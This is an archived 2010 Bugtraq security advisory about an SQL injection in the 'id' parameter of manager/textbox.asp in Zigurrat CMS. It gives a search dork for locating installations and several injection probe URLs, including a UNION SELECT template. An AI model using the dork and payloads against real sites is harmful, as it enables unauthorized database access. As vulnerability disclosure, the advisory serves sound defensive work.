lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 15 Mar 2010 12:02:03 -0000
From: faghani@...c.ir
To: bugtraq@...urityfocus.com
Subject: Zigurrat CMS SQL Injection Vulnerability

================= IUT-CERT =================

Title: Zigurrat CMS SQL Injection Vulnerability

Vendor: www.farsi-cms.com

Dork: Design by Tagfa Co
Type: Input.Validation.Vulnerability (SQL Injection)

Fix: N/A

================== nsec.ir =================

Description:

------------------

Zigurrat CMS is a CMS producer in Iran. "manager/textbox.asp" pages in Pars CMS

product are vulnerable to SQL Injection vulnerability.

Vulnerability Variant:

------------------
Injection "manager/textbox.asp" in "id" parameter. 

http://www.example.com/manager/textbox.asp?id='

http://www.example.com/manager/textbox.asp?id=0'

http://www.example.com/manager/textbox.asp?id=%2527

http://www.example.com/manager/textbox.asp?id=\'

http://www.example.com/manager/textbox.asp?id=<number> UNION SELECT *FROM VALIDTBLNAME'

Solution:

------------------

Input validation of Parameter "id" should be corrected.

Credit:

------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari

Powered by blists - more mailing lists